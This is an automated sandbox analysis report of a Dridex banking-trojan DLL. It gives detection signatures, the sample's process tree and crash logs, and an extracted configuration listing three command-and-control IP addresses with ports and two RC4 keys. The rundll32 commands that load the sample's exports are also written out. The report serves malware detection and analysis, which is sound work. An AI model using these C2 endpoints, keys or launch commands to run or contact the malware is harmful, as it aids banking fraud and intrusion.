Loading ...

Play interactive tourEdit tour

Analysis Report b8fe43e6_by_Libranalysis.dll

Overview

General Information

Sample Name:b8fe43e6_by_Libranalysis.dll
Analysis ID:404281
MD5:b8fe43e6e418db516c1deda8d2b1e8d0
SHA1:d6901a2528977ed284f9e6808a73029371cd2ecc
SHA256:6ea1efc4c1dd494c71fbfb23ea1fdc5530f9cbb6602993d96a74a7b014a96ee3
Tags:Dridex
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Dridex unpacked file
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 3440 cmdline: loaddll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 748 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4308 cmdline: rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 5256 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 760 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4872 cmdline: rundll32.exe C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll,LoxmtYt MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5804 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 928 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5012 cmdline: rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',DllCanUnloadNow MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5584 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5984 cmdline: rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',DllGetClassObject MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5408 cmdline: rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',WdiAddFileToInstance MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 1540 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4868 cmdline: rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',WdiAddParameter MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5040 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 2992 cmdline: rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',WdiCancel MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 1968 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 592 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 40112, "C2 list": ["193.200.130.181:443", "95.138.161.226:2303", "167.114.113.13:4125"], "RC4 keys": ["MqW38NQIO70GhjGOOvjtl5AwyenW6A8fcZ", "xeMr6QHn7uRk1D2ChU8OuyaRFUZJZZHUIgxCzaPXtOkjmhTMtNxfWU8nlnD7q009ahEI51R1"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_14ccacb0\Report.werSUSP_WER_Critical_HeapCorruptionDetects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation)Florian Roth
  • 0x11c:$a1: ReportIdentifier=
  • 0x19e:$a1: ReportIdentifier=
  • 0x77c:$a2: .Name=Fault Module Name
  • 0x92a:$s1: c0000374
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_15960134\Report.werSUSP_WER_Critical_HeapCorruptionDetects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation)Florian Roth
  • 0x11c:$a1: ReportIdentifier=
  • 0x19e:$a1: ReportIdentifier=
  • 0x77c:$a2: .Name=Fault Module Name
  • 0x92a:$s1: c0000374

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.319669645.0000000010001000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    0000000E.00000002.508405048.0000000010001000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
      00000012.00000002.513324135.0000000010001000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        00000010.00000002.509454632.0000000010001000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
          00000014.00000002.505756712.0000000010001000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            14.2.rundll32.exe.10000000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
              16.2.rundll32.exe.10000000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                20.2.rundll32.exe.10000000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                  18.2.rundll32.exe.10000000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                    3.2.rundll32.exe.10000000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 14.2.rundll32.exe.10000000.3.unpackMalware Configuration Extractor: Dridex {"Version": 40112, "C2 list": ["193.200.130.181:443", "95.138.161.226:2303", "167.114.113.13:4125"], "RC4 keys": ["MqW38NQIO70GhjGOOvjtl5AwyenW6A8fcZ", "xeMr6QHn7uRk1D2ChU8OuyaRFUZJZZHUIgxCzaPXtOkjmhTMtNxfWU8nlnD7q009ahEI51R1"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: b8fe43e6_by_Libranalysis.dllMetadefender: Detection: 21%Perma Link
                      Source: b8fe43e6_by_Libranalysis.dllReversingLabs: Detection: 29%
                      Machine Learning detection for sampleShow sources
                      Source: b8fe43e6_by_Libranalysis.dllJoe Sandbox ML: detected
                      Source: 0.2.loaddll32.exe.d80000.1.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 16.2.rundll32.exe.5e0000.2.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 18.2.rundll32.exe.3400000.2.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 2.2.rundll32.exe.f40000.2.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 3.2.rundll32.exe.b30000.2.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 14.2.rundll32.exe.8d0000.2.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 17.2.rundll32.exe.33e0000.2.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 20.2.rundll32.exe.32d0000.1.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: b8fe43e6_by_Libranalysis.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: b8fe43e6_by_Libranalysis.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: FGERN.pdb source: b8fe43e6_by_Libranalysis.dll

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 193.200.130.181:443
                      Source: Malware configuration extractorIPs: 95.138.161.226:2303
                      Source: Malware configuration extractorIPs: 167.114.113.13:4125
                      Source: Joe Sandbox ViewIP Address: 167.114.113.13 167.114.113.13
                      Source: Joe Sandbox ViewIP Address: 95.138.161.226 95.138.161.226
                      Source: Joe Sandbox ViewIP Address: 193.200.130.181 193.200.130.181
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewASN Name: RACKSPACE-LONGB RACKSPACE-LONGB
                      Source: Joe Sandbox ViewASN Name: CLOUD-MANAGEMENT-LLCUS CLOUD-MANAGEMENT-LLCUS

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 00000003.00000002.319669645.0000000010001000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.508405048.0000000010001000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.513324135.0000000010001000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.509454632.0000000010001000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.505756712.0000000010001000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.512489931.0000000010001000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100014943_2_10001494
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100114603_2_10011460
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000846C3_2_1000846C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000A52C3_2_1000A52C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10011D583_2_10011D58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100193483_2_10019348
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100107543_2_10010754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100090CC3_2_100090CC
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 760
                      Source: b8fe43e6_by_Libranalysis.dllBinary or memory string: OriginalFilenamej2pcsc.dllN vs b8fe43e6_by_Libranalysis.dll
                      Source: b8fe43e6_by_Libranalysis.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_14ccacb0\Report.wer, type: DROPPEDMatched rule: SUSP_WER_Critical_HeapCorruption date = 2019-10-18, author = Florian Roth, description = Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), reference = https://twitter.com/cyb3rops/status/1185459425710092288, score =
                      Source: C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_15960134\Report.wer, type: DROPPEDMatched rule: SUSP_WER_Critical_HeapCorruption date = 2019-10-18, author = Florian Roth, description = Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), reference = https://twitter.com/cyb3rops/status/1185459425710092288, score =
                      Source: b8fe43e6_by_Libranalysis.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal76.troj.evad.winDLL@24/28@0/4
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5012
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4868
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4308
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5408
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3440
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5984
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4872
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER9475.tmpJump to behavior
                      Source: b8fe43e6_by_Libranalysis.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll,LoxmtYt
                      Source: b8fe43e6_by_Libranalysis.dllMetadefender: Detection: 21%
                      Source: b8fe43e6_by_Libranalysis.dllReversingLabs: Detection: 29%
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll,LoxmtYt
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 760
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 928
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',DllCanUnloadNow
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',DllGetClassObject
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',WdiAddFileToInstance
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',WdiAddParameter
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',WdiCancel
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 756
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 756
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 756
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 756
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 592
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll,LoxmtYtJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',DllCanUnloadNowJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',DllGetClassObjectJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',WdiAddFileToInstanceJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',WdiAddParameterJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',WdiCancelJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',#1Jump to behavior
                      Source: b8fe43e6_by_Libranalysis.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: b8fe43e6_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: FGERN.pdb source: b8fe43e6_by_Libranalysis.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000F6CC push esi; mov dword ptr [esp], 00000000h3_2_1000F6CD
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.5511794748
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
